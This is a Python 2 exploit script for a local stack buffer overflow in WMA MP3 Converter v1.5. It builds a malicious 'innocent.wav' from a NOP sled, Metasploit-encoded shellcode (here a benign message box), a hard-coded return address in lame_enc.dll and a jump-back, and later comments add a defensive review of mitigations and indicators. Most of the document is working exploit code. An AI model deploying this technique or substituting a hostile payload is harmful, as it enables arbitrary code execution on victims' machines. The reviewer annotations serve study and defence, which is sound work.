#!/usr/bin/python -w
###################################################################################
# Exploit: WMA MP3 Converter v1.5 (.wav) Local BOF                                #
# OS: Only tested on Win7 SP1 PRO (lame_enc.dll might be subject to rebase)       #
# Author: b33f (Ruben Boonen)                                                     #
# Software: http://www.newsoftware.us/free-wma-mp3-converter/download/pages-2.html#
#---------------------------------------------------------------------------------#
# This is a improved rework of Julien Ahrens POC using a different                #
# technique to gain more space and enumerate the actual badchar list              #
# which is 2 characters not 7.                                                    #
###################################################################################
#
# Reviewer notes (defensive reading of this PoC):
#
# - The whole script is a flat Python 2 module: every string literal below is a
#   byte string, and the file is written as-is.  Nothing here parses or emits a
#   RIFF/WAVE header -- the output is a raw 4122-byte blob (computed from the
#   `buffer` expression: 4112 bytes of sled+payload+padding plus a 10-byte
#   trailer).  A consumer that validated the container (`RIFF` magic, chunk
#   sizes) before copying data into a fixed-size stack buffer would reject this
#   input before the overflow is reached.
# - The return address 0x100138be is hard-coded into a non-ASLR'd module
#   (lame_enc.dll, see the header note about rebasing).  Mitigation-wise this
#   is the classic case where ASLR/DEP on the DLL, or simply a stack cookie in
#   the vulnerable parser, breaks the technique; a module loaded at its
#   preferred base is a prerequisite the author calls out explicitly.
# - Indicators for this specific sample: a `.wav` of exactly 4122 bytes with no
#   `RIFF` magic, beginning with a run of 0x90 bytes.  These are sample-specific
#   and trivially varied, so they are not a durable signature.
# - NOTE(review): `-w` in the shebang is not a CPython interpreter switch
#   (presumably `-W` was meant); it has no effect when the script is run as
#   `python script.py` on Windows, which is the documented target.

# Output path of the crafted file (relative to the current working directory).
filename="innocent.wav"

###############################################################################
# msfpayload windows/messagebox TEXT='Who uses *.wav anyway!!' TITLE='b33f' R|#
# msfencode -b '\x00\x0A' -t c                                                #
# => size 297                                                                 #
###############################################################################
# Benign demonstration payload (pops a message box).  It was encoded to avoid
# 0x00 and 0x0A; the 19 full lines of 15 bytes plus the 12-byte final line do
# total 297 bytes, matching the author's note.
msgbox = (
"\xd9\xeb\xd9\x74\x24\xf4\x58\xbd\xf1\xd4\x41\xc7\x33\xc9\xb1"
"\x44\x83\xe8\xfc\x31\x68\x15\x03\x68\x15\x13\x21\x98\x2c\x48"
"\x13\x6f\x97\x9a\x95\x42\x65\x15\xe7\xab\xee\x52\x76\x1c\x64"
"\x12\x75\xd7\x0c\xc6\x0e\xa1\xf8\x7d\x6e\x0e\x72\xb7\xb7\x01"
"\x9c\xc2\x34\xc4\x9d\xfd\x44\x16\xfd\x76\xd6\xfd\xda\x03\x62"
"\xc2\xa9\x47\x45\x42\xaf\x8d\x1e\xf8\xb7\xda\x7b\xdd\xc6\x37"
"\x98\x29\x80\x4c\x6b\xd9\x13\xbc\xa5\x22\x22\x80\x3a\x70\xc1"
"\xc0\xb7\x8e\x0b\x0f\x3a\x90\x4c\x64\xb1\xa9\x2e\x5e\x12\xbb"
"\x2f\x15\x38\x67\xb1\xc2\xdb\xec\xbd\x5f\xaf\xa9\xa1\x5e\x44"
"\xc6\xde\xeb\x9b\x31\x57\xaf\xbf\xdd\x09\xec\x72\xd5\xe0\x26"
"\xfb\x03\x7b\x04\x94\x45\x32\x86\x89\x08\x23\x09\xae\x52\x4c"
"\xbc\x14\xa9\x08\xc0\x4e\x53\x1d\xbb\x73\xb0\xb0\x2b\x05\x47"
"\xcb\x54\x93\xfd\x3c\xc2\xc8\x91\x1c\x53\x79\x59\x6f\x7d\x1d"
"\xf5\xfa\xf2\xb8\x77\x8d\xa8\x66\x72\x04\xb6\x31\x7d\x43\x32"
"\x37\x43\x3c\x81\xef\xe6\xf0\x49\x68\xfa\x2e\xe3\x9f\x62\xd0"
"\xfc\x9f\x0d\x76\x22\x40\xee\xee\x40\xb3\xdd\x88\xb5\x68\xa9"
"\x09\x91\x8a\x23\x52\xb1\xeb\x12\xb4\x19\x64\x3b\xcf\xee\x15"
"\xab\x4e\x66\xf6\x4a\xf9\xa6\xdc\xa2\x8e\xce\x55\xc8\x15\x7d"
"\xfe\x79\xbe\xee\xde\xb4\xf7\x78\x52\x93\x10\xf1\x8a\xea\xcc"
"\x53\x1e\x5c\xa3\xac\x70\x6f\x83\x02\x8e\xc5\x0b")

###############################################################################
# (*) Badchars => \x00\x0A                                                    #
# (1) 0x100138be : push esp # ret => lame_enc.dll                             #
# (2) We tag on a single NOP because the application doesn't make a clean jmp #
#     to ESP, there is a '\x30' which would otherwhise contaminate our        #
#     following instructions.                                                 #
# (3) Jump back to the beginning of our buffer and to our shellcode           #
###############################################################################
# Layout of the emitted file (offsets derived from the expression below):
#   [0,   10)   ten 0x90 bytes
#   [10, 307)   msgbox payload (297 bytes)
#   [307, 4112) 0x90 padding up to the saved return address
#   [4112,4116) 0x100138be, little-endian (the author's pivot in lame_enc.dll)
#   [4116,4117) one 0x90, see note (2) above
#   [4117,4122) 5-byte relative jump back toward offset 0, see note (3)
shellcode = "\x90"*10 + msgbox
buffer = shellcode + "\x90"*(4112-len(shellcode)) + "\xBE\x38\x01\x10\x90\xE9\xEC\xEF\xFF\xFF"

# 'w' is text mode: on Windows a 0x0A byte would be translated to CR LF and
# shift every later offset, which is presumably why 0x0A appears in the badchar
# list above -- no byte in `buffer` is 0x0A, so the output is written unchanged.
# Under Python 3 this same call would encode the str as UTF-8 and corrupt the
# high bytes; the script is Python 2 only as written.
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()